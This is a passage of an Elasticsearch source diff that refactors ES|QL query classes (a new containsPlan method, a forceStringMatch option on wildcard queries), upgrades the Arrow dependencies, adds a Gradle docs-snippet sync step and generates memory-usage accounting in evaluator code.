Throws an exception if the expression is not foldable. diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/AutomatonQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/AutomatonQuery.java deleted file mode 100644 index 343cabc6feea9..0000000000000 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/AutomatonQuery.java +++ /dev/null @@ -1,66 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ -package org.elasticsearch.xpack.esql.core.querydsl.query; - -import org.apache.lucene.util.automaton.Automaton; -import org.elasticsearch.index.query.AutomatonQueryBuilder; -import org.elasticsearch.index.query.QueryBuilder; -import org.elasticsearch.xpack.esql.core.tree.Source; - -import java.util.Objects; - -/** - * Query that matches documents based on a Lucene Automaton. 
- */ -public class AutomatonQuery extends Query { - - private final String field; - private final Automaton automaton; - private final String automatonDescription; - - public AutomatonQuery(Source source, String field, Automaton automaton, String automatonDescription) { - super(source); - this.field = field; - this.automaton = automaton; - this.automatonDescription = automatonDescription; - } - - public String field() { - return field; - } - - @Override - protected QueryBuilder asBuilder() { - return new AutomatonQueryBuilder(field, automaton, automatonDescription); - } - - @Override - public int hashCode() { - return Objects.hash(field, automaton, automatonDescription); - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - - if (obj == null || getClass() != obj.getClass()) { - return false; - } - - AutomatonQuery other = (AutomatonQuery) obj; - return Objects.equals(field, other.field) - && Objects.equals(automaton, other.automaton) - && Objects.equals(automatonDescription, other.automatonDescription); - } - - @Override - protected String innerToString() { - return "AutomatonQuery{" + "field='" + field + '\'' + '}'; - } -} diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java index 2525eb8778488..ccea01378e6bd 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java @@ -100,4 +100,14 @@ public Query negate(Source source) { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + for (Query q : queries) { + if (q.containsPlan()) { + return true; + } + } + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java index 42876f2a7ead3..5bad8d60a4db9 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java @@ -29,4 +29,9 @@ protected QueryBuilder asBuilder() { protected String innerToString() { return name; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java index f0806660c3f7a..1a15c28fc89a5 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java @@ -75,4 +75,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + ":" + "(" + distance + "," + "(" + lat + ", " + lon + "))"; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java index 
3a868349a183d..76bc291dab651 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java @@ -25,4 +25,9 @@ protected QueryBuilder asBuilder() { protected String innerToString() { return ""; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java index 1a37fc8f42b9a..c62f54ea99693 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java @@ -59,4 +59,9 @@ protected String innerToString() { public Query negate(Source source) { return child; } + + @Override + public boolean containsPlan() { + return child.containsPlan(); + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java index ede4aee3d117e..628a38f9cace0 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java @@ -61,4 +61,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + ":" + query; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java index 456275a054899..0b17f1b16b4af 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java @@ -70,6 +70,12 @@ public final QueryBuilder toQueryBuilder() { */ protected abstract String innerToString(); + /** + * Does the result of calling {@link #asBuilder()} need the plan + * to serialize itself? 
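// [Editor's sketch - not part of the patch] The abstract containsPlan() hook
// declared just below is answered by plain composite recursion, as the
// overrides throughout this diff show: leaf queries return false, NotQuery
// defers to its child, and BoolQuery ORs over its sub-queries. Standalone
// model (Node/LeafNode/NotNode/BoolNode are illustrative names):
abstract class Node {
    abstract boolean containsPlan();
}

final class LeafNode extends Node {
    @Override
    boolean containsPlan() {
        return false; // term/range/exists-style leaves never embed a plan
    }
}

final class NotNode extends Node {
    private final Node child;

    NotNode(Node child) {
        this.child = child;
    }

    @Override
    boolean containsPlan() {
        return child.containsPlan(); // negation preserves the child's answer
    }
}

final class BoolNode extends Node {
    private final java.util.List<Node> queries;

    BoolNode(java.util.List<Node> queries) {
        this.queries = queries;
    }

    @Override
    boolean containsPlan() {
        for (Node q : queries) {
            if (q.containsPlan()) {
                return true; // one sub-query needing the plan taints the whole tree
            }
        }
        return false;
    }
}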
+ */ + public abstract boolean containsPlan(); + @Override public boolean equals(Object obj) { if (obj == null || obj.getClass() != getClass()) { diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java index 3a125f87254bd..14c32cd97b236 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java @@ -137,4 +137,9 @@ protected String innerToString() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java index e7ddfd1735b28..7f8bcc3c34a47 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java @@ -118,4 +118,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + ":" + (includeLower ? "[" : "(") + lower + ", " + upper + (includeUpper ? "]" : ")") + "@" + zoneId.getId(); } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java index b12802de4e715..0669039cde9c1 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java @@ -69,4 +69,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + "~ /" + regex + "/"; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java index 03c3b29ba15ec..040083fe3d1d7 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java @@ -91,4 +91,9 @@ protected String innerToString() { public boolean scorable() { return scorable; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java index 68f8dd711f87a..ae1ff0f74c409 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java @@ -53,4 +53,9 @@ public boolean equals(Object obj) { protected String innerToString() { return term + ":" + values; } + + @Override + public boolean 
containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java index 03d819cf7aa9b..e64f5f5652027 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java @@ -12,22 +12,18 @@ import java.util.Objects; -import static org.elasticsearch.index.query.QueryBuilders.wildcardQuery; - public class WildcardQuery extends Query { private final String field, query; private final boolean caseInsensitive; + private final boolean forceStringMatch; - public WildcardQuery(Source source, String field, String query) { - this(source, field, query, false); - } - - public WildcardQuery(Source source, String field, String query, boolean caseInsensitive) { + public WildcardQuery(Source source, String field, String query, boolean caseInsensitive, boolean forceStringMatch) { super(source); this.field = field; this.query = query; this.caseInsensitive = caseInsensitive; + this.forceStringMatch = forceStringMatch; } public String field() { @@ -44,14 +40,14 @@ public Boolean caseInsensitive() { @Override protected QueryBuilder asBuilder() { - WildcardQueryBuilder wb = wildcardQuery(field, query); + WildcardQueryBuilder wb = new WildcardQueryBuilder(field, query, forceStringMatch); // ES does not allow case_insensitive to be set to "false", it should be either "true" or not specified return caseInsensitive == false ? wb : wb.caseInsensitive(caseInsensitive); } @Override public int hashCode() { - return Objects.hash(field, query, caseInsensitive); + return Objects.hash(field, query, caseInsensitive, forceStringMatch); } @Override @@ -67,11 +63,17 @@ public boolean equals(Object obj) { WildcardQuery other = (WildcardQuery) obj; return Objects.equals(field, other.field) && Objects.equals(query, other.query) - && Objects.equals(caseInsensitive, other.caseInsensitive); + && Objects.equals(caseInsensitive, other.caseInsensitive) + && Objects.equals(forceStringMatch, other.forceStringMatch); } @Override protected String innerToString() { return field + ":" + query; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java b/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java index d0aa9bd073ec8..5f6632eb7ba31 100644 --- a/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java +++ b/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java @@ -31,6 +31,11 @@ protected QueryBuilder asBuilder() { protected String innerToString() { return ""; } + + @Override + public boolean containsPlan() { + return false; + } } public void testEqualsAndHashCode() { diff --git a/x-pack/plugin/esql/arrow/build.gradle b/x-pack/plugin/esql/arrow/build.gradle index fac0bd0a77452..d6fa48982d029 100644 --- a/x-pack/plugin/esql/arrow/build.gradle +++ b/x-pack/plugin/esql/arrow/build.gradle @@ -12,9 +12,9 @@ dependencies { compileOnly project(':x-pack:plugin:esql:compute') compileOnly project(':x-pack:plugin:esql-core') compileOnly project(':x-pack:plugin:mapper-version') - 
implementation('org.apache.arrow:arrow-vector:16.1.0') - implementation('org.apache.arrow:arrow-format:16.1.0') - implementation('org.apache.arrow:arrow-memory-core:16.1.0') + implementation('org.apache.arrow:arrow-vector:18.3.0') + implementation('org.apache.arrow:arrow-format:18.3.0') + implementation('org.apache.arrow:arrow-memory-core:18.3.0') implementation('org.checkerframework:checker-qual:3.42.0') implementation('com.google.flatbuffers:flatbuffers-java:23.5.26') // Needed for the json arrow serialization, and loaded even if we don't use it. @@ -25,7 +25,7 @@ dependencies { runtimeOnly "org.slf4j:slf4j-nop:${versions.slf4j}" testImplementation project(':test:framework') - testImplementation('org.apache.arrow:arrow-memory-unsafe:16.1.0') + testImplementation('org.apache.arrow:arrow-memory-unsafe:18.3.0') testImplementation("com.fasterxml.jackson.datatype:jackson-datatype-jsr310:${versions.jackson}") } @@ -38,18 +38,8 @@ tasks.named("dependencyLicenses").configure { tasks.named("thirdPartyAudit").configure { ignoreViolations( // uses sun.misc.Unsafe. Only used in tests. - 'org.apache.arrow.memory.util.hash.SimpleHasher', - 'org.apache.arrow.memory.util.hash.MurmurHasher', 'org.apache.arrow.memory.util.MemoryUtil', 'org.apache.arrow.memory.util.MemoryUtil$1', - 'org.apache.arrow.vector.DecimalVector', - 'org.apache.arrow.vector.BaseFixedWidthVector', - 'org.apache.arrow.vector.util.DecimalUtility', - 'org.apache.arrow.vector.Decimal256Vector', - 'org.apache.arrow.vector.util.VectorAppender', - 'org.apache.arrow.memory.ArrowBuf', - 'org.apache.arrow.vector.BitVectorHelper', - 'org.apache.arrow.memory.util.ByteFunctionHelpers', ) ignoreMissingClasses( 'org.apache.commons.codec.binary.Hex' diff --git a/x-pack/plugin/esql/build.gradle b/x-pack/plugin/esql/build.gradle index 0db0e558cd147..447ceb53489f2 100644 --- a/x-pack/plugin/esql/build.gradle +++ b/x-pack/plugin/esql/build.gradle @@ -226,6 +226,47 @@ tasks.named("test").configure { } } +// This is similar to the test task above, but needed for the LookupJoinTypesIT which runs in the internalClusterTest task +// and generates a types table for the LOOKUP JOIN command. It is possible that in future we might have more tests that do this. +tasks.named("internalClusterTest").configure { + if (buildParams.ci == false) { + systemProperty 'generateDocs', true + def injected = project.objects.newInstance(Injected) + // Define the folder to delete and recreate + def tempDir = file("build/testrun/internalClusterTest/temp/esql") + doFirst { + injected.fs.delete { + it.delete(tempDir) + } + // Re-create this folder so we can save a table of generated examples to extract from csv-spec tests + tempDir.mkdirs() // Recreate the folder + } + File snippetsFolder = file("build/testrun/internalClusterTest/temp/esql/_snippets") + def snippetsDocFolder = file("${rootDir}/docs/reference/query-languages/esql/_snippets") + def snippetsTree = fileTree(snippetsFolder).matching { + include "**/types/*.md" // Recursively include all types/*.md files (effectively counting functions and operators) + } + + doLast { + def snippets = snippetsTree.files.collect { it.name } + int countSnippets = snippets.size() + if (countSnippets == 0) { + logger.quiet("ESQL Docs: No function/operator snippets created. 
Skipping sync.") + } else { + logger.quiet("ESQL Docs: Found $countSnippets generated function/operator snippets to patch into docs") + injected.fs.sync { + from snippetsFolder + into snippetsDocFolder + include '**/*.md' + preserve { + include '**/*.md' + } + } + } + } + } +} + /**************************************************************** * Enable QA/rest integration tests for snapshot builds only * * TODO: Enable for all builds upon this feature release * diff --git a/x-pack/plugin/esql/compute/build.gradle b/x-pack/plugin/esql/compute/build.gradle index 66867ae668fcc..5724b129efd16 100644 --- a/x-pack/plugin/esql/compute/build.gradle +++ b/x-pack/plugin/esql/compute/build.gradle @@ -3,6 +3,7 @@ import org.elasticsearch.gradle.internal.util.SourceDirectoryCommandLineArgument apply plugin: 'elasticsearch.build' apply plugin: 'elasticsearch.string-templates' apply plugin: 'elasticsearch.publish' +apply plugin: 'elasticsearch.transport-version-references' base { archivesName = 'x-pack-esql-compute' diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java index 2e43886b04929..091b5c9d2fdcb 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java @@ -23,6 +23,7 @@ import javax.lang.model.type.TypeMirror; import javax.lang.model.util.Elements; +import static org.elasticsearch.compute.gen.EvaluatorImplementer.baseRamBytesUsed; import static org.elasticsearch.compute.gen.Methods.buildFromFactory; import static org.elasticsearch.compute.gen.Methods.getMethod; import static org.elasticsearch.compute.gen.Types.ABSTRACT_CONVERT_FUNCTION_EVALUATOR; @@ -98,6 +99,7 @@ private TypeSpec type() { builder.addJavadoc("This class is generated. 
Edit {@code " + getClass().getSimpleName() + "} instead."); builder.addModifiers(Modifier.PUBLIC, Modifier.FINAL); builder.superclass(ABSTRACT_CONVERT_FUNCTION_EVALUATOR); + builder.addField(baseRamBytesUsed(implementation)); for (EvaluatorImplementer.ProcessFunctionArg a : processFunction.args) { a.declareField(builder); @@ -113,6 +115,7 @@ private TypeSpec type() { } builder.addMethod(processFunction.toStringMethod(implementation)); builder.addMethod(processFunction.close()); + builder.addMethod(processFunction.baseRamBytesUsed()); builder.addType(factory()); return builder.build(); } diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java index 018eadd42b44b..e5b6e4992f1a2 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/EvaluatorImplementer.java @@ -9,6 +9,7 @@ import com.squareup.javapoet.ArrayTypeName; import com.squareup.javapoet.ClassName; +import com.squareup.javapoet.FieldSpec; import com.squareup.javapoet.JavaFile; import com.squareup.javapoet.MethodSpec; import com.squareup.javapoet.ParameterizedTypeName; @@ -47,6 +48,7 @@ import static org.elasticsearch.compute.gen.Types.INT_BLOCK; import static org.elasticsearch.compute.gen.Types.LONG_BLOCK; import static org.elasticsearch.compute.gen.Types.PAGE; +import static org.elasticsearch.compute.gen.Types.RAM_USAGE_ESIMATOR; import static org.elasticsearch.compute.gen.Types.RELEASABLE; import static org.elasticsearch.compute.gen.Types.RELEASABLES; import static org.elasticsearch.compute.gen.Types.SOURCE; @@ -96,6 +98,7 @@ private TypeSpec type() { builder.addJavadoc("This class is generated. Edit {@code " + getClass().getSimpleName() + "} instead."); builder.addModifiers(Modifier.PUBLIC, Modifier.FINAL); builder.addSuperinterface(EXPRESSION_EVALUATOR); + builder.addField(baseRamBytesUsed(implementation)); builder.addType(factory()); builder.addField(SOURCE, "source", Modifier.PRIVATE, Modifier.FINAL); @@ -106,6 +109,7 @@ private TypeSpec type() { builder.addMethod(ctor()); builder.addMethod(eval()); + builder.addMethod(processFunction.baseRamBytesUsed()); if (processOutputsMultivalued) { if (processFunction.args.stream().anyMatch(x -> x instanceof FixedProcessFunctionArg == false)) { @@ -123,6 +127,19 @@ private TypeSpec type() { return builder.build(); } + static FieldSpec baseRamBytesUsed(ClassName implementation) { + FieldSpec.Builder builder = FieldSpec.builder( + TypeName.LONG, + "BASE_RAM_BYTES_USED", + Modifier.PRIVATE, + Modifier.STATIC, + Modifier.FINAL + ); + builder.initializer("$T.shallowSizeOfInstance($T.class)", RAM_USAGE_ESIMATOR, implementation); + + return builder.build(); + } + private MethodSpec ctor() { MethodSpec.Builder builder = MethodSpec.constructorBuilder().addModifiers(Modifier.PUBLIC); builder.addParameter(SOURCE, "source"); @@ -411,6 +428,11 @@ interface ProcessFunctionArg { * The string to close this argument or {@code null}. 
*/ String closeInvocation(); + + /** + * Invokes {@code baseRamBytesUsed} on sub-expressions and adds each result to the generated method's running total. + */ + void sumBaseRamBytesUsed(MethodSpec.Builder builder); } record StandardProcessFunctionArg(TypeName type, String name) implements ProcessFunctionArg { @@ -535,6 +557,11 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return name; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) { + builder.addStatement("baseRamBytesUsed += $L.baseRamBytesUsed()", name); + } } private record ArrayProcessFunctionArg(TypeName componentType, String name) implements ProcessFunctionArg { @@ -667,6 +694,13 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return "() -> Releasables.close(" + name + ")"; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) { + builder.beginControlFlow("for ($T e : $L)", EXPRESSION_EVALUATOR, name); + builder.addStatement("baseRamBytesUsed += e.baseRamBytesUsed()"); + builder.endControlFlow(); + } } record FixedProcessFunctionArg(TypeName type, String name, boolean includeInToString, Scope scope, boolean releasable) @@ -769,6 +803,9 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return releasable ? name : null; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) {} } private record BuilderProcessFunctionArg(ClassName type, String name) implements ProcessFunctionArg { @@ -853,6 +890,9 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return null; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) {} } private record BlockProcessFunctionArg(TypeName type, String name) implements ProcessFunctionArg { @@ -940,6 +980,11 @@ public void buildToStringInvocation(StringBuilder pattern, List args, St public String closeInvocation() { return name; } + + @Override + public void sumBaseRamBytesUsed(MethodSpec.Builder builder) { + builder.addStatement("baseRamBytesUsed += $L.baseRamBytesUsed()", name); + } } static class ProcessFunction { @@ -1085,6 +1130,18 @@ MethodSpec close() { } return builder.build(); } + + MethodSpec baseRamBytesUsed() { + MethodSpec.Builder builder = MethodSpec.methodBuilder("baseRamBytesUsed").addAnnotation(Override.class); + builder.addModifiers(Modifier.PUBLIC).returns(TypeName.LONG); + + builder.addStatement("long baseRamBytesUsed = BASE_RAM_BYTES_USED"); + for (ProcessFunctionArg arg : args) { + arg.sumBaseRamBytesUsed(builder); + } + builder.addStatement("return baseRamBytesUsed"); + return builder.build(); + } } static boolean isBlockType(TypeName type) { diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java index 1704f4cbeb1fe..e827edd8e996d 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/GroupingAggregatorImplementer.java @@ -199,7 +199,7 @@ private TypeSpec type() { builder.addMethod(ctor()); builder.addMethod(intermediateStateDesc()); builder.addMethod(intermediateBlockCount()); - builder.addMethod(prepareProcessPage()); + builder.addMethod(prepareProcessRawInputPage()); for (ClassName 
groupIdClass : GROUP_IDS_CLASSES) { builder.addMethod(addRawInputLoop(groupIdClass, blockType(aggParam.type()))); builder.addMethod(addRawInputLoop(groupIdClass, vectorType(aggParam.type()))); @@ -314,10 +314,10 @@ private MethodSpec intermediateBlockCount() { } /** - * Prepare to process a single page of results. + * Prepare to process a single raw input page. */ - private MethodSpec prepareProcessPage() { - MethodSpec.Builder builder = MethodSpec.methodBuilder("prepareProcessPage"); + private MethodSpec prepareProcessRawInputPage() { + MethodSpec.Builder builder = MethodSpec.methodBuilder("prepareProcessRawInputPage"); builder.addAnnotation(Override.class).addModifiers(Modifier.PUBLIC).returns(GROUPING_AGGREGATOR_FUNCTION_ADD_INPUT); builder.addParameter(SEEN_GROUP_IDS, "seenGroupIds").addParameter(PAGE, "page"); diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java index 1872012500ea7..a3a3cbf7e7123 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/MvEvaluatorImplementer.java @@ -137,6 +137,7 @@ private TypeSpec type() { builder.addField(SOURCE, "source", Modifier.PRIVATE, Modifier.FINAL); builder.addField(WARNINGS, "warnings", Modifier.PRIVATE); } + builder.addField(EvaluatorImplementer.baseRamBytesUsed(implementation)); builder.addMethod(ctor()); builder.addMethod(name()); @@ -159,6 +160,7 @@ private TypeSpec type() { if (warnExceptions.isEmpty() == false) { builder.addMethod(EvaluatorImplementer.warnings()); } + builder.addMethod(baseRamBytesUsed()); return builder.build(); } @@ -581,4 +583,12 @@ private void call(MethodSpec.Builder builder) { } } } + + MethodSpec baseRamBytesUsed() { + MethodSpec.Builder builder = MethodSpec.methodBuilder("baseRamBytesUsed").addAnnotation(Override.class); + builder.addModifiers(Modifier.PUBLIC).returns(TypeName.LONG); + + builder.addStatement("return BASE_RAM_BYTES_USED + field.baseRamBytesUsed()"); + return builder.build(); + } } diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java index 729e435934b89..c68e172ecde69 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/Types.java @@ -42,6 +42,7 @@ public class Types { static final ClassName CIRCUIT_BREAKER = ClassName.get("org.elasticsearch.common.breaker", "CircuitBreaker"); static final ClassName BIG_ARRAYS = ClassName.get("org.elasticsearch.common.util", "BigArrays"); + static final ClassName RAM_USAGE_ESIMATOR = ClassName.get("org.apache.lucene.util", "RamUsageEstimator"); static final ClassName BOOLEAN_BLOCK = ClassName.get(DATA_PACKAGE, "BooleanBlock"); static final ClassName BYTES_REF_BLOCK = ClassName.get(DATA_PACKAGE, "BytesRefBlock"); diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java index 51195578ac363..cb0dff8a86dc5 100644 --- 
a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregator.java @@ -24,6 +24,7 @@ import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.data.OrdinalBytesRefBlock; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; /** @@ -55,8 +56,8 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static GroupingAggregatorFunction.AddInput wrapAddInput( @@ -76,7 +77,7 @@ public static GroupingAggregatorFunction.AddInput wrapAddInput( } public static void combine(GroupingState state, int groupId, BytesRef v) { - state.values.add(groupId, BlockHash.hashOrdToGroup(state.bytes.add(v))); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, BytesRefBlock values, int valuesPosition) { @@ -84,17 +85,20 @@ public static void combineIntermediate(GroupingState state, int groupId, BytesRe int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getBytesRef(i, scratch)); + 